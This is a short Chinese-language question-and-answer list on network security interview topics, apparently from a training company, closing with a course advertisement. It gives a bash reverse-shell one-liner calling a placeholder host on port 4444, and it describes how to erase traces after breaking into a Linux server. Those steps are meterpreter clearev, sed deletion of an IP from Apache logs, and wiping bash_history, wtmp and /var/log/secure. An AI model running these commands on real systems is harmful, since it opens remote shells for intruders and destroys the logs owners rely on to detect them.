数据库
1.各种数据库文件存放的位置mysql:
/usr/local/mysql/data/
C:\ProgramData\MySQL\MySQL Server 5.6\Data\
oracle:$ORACLE_BASE/oradata/$ORACLE_SID/
系统
2.如何清理日志?
meterpreter: clearev
3.入侵 Linux 服务器后需要清除哪些日志?
web 日志,如 apache 的 access.log,error.log。直接将日志清除过于明显,一般使用 sed 进行定向清除
e.g. sed -i -e ‘/192.169.1.1/d’
history 命令的清除,也是对~/.bash_history 进行定向清除
wtmp 日志的清除,/var/log/wtmp
登录日志清除 /var/log/secure
LINUX
4.查看当前端口连接的命令有哪些?netstat 和 ss 命令的区别和优缺点
netstat -antp` `ss -l
ss 的优势在于它能够显示更多更详细的有关 TCP 和连接状态的信息,而且比 netstat 更快速更高效。
5.反弹 shell 的常用命令?一般常反弹哪一种 shell?为什么?
bash -i>&/dev/tcp/x.x.x.x/4444
0>&1
6.通过 Linux 系统的/proc 目录,能够获取到哪些信息,这些信息可以在安全上有哪些应用?
ls /proc
系统信息,硬件信息,内核版本,加载的模块,进程
7.linux 系统中,检测哪些配置文件的配置项,能够提升 SSH 的安全性。
/etc/ssh/sshd___configiptables 配置
8.如何一条命令查看文件内容最后一百行?
tail -n 100 filename
更多关于网络安全培训的问题,欢迎咨询千锋教育在线名师,如果想要了解我们的师资、课程、项目实操的话可以点击咨询课程顾问,获取试听资格来试听我们的课程,在线零距离接触千锋教育大咖名师,让你轻松从入门到精通。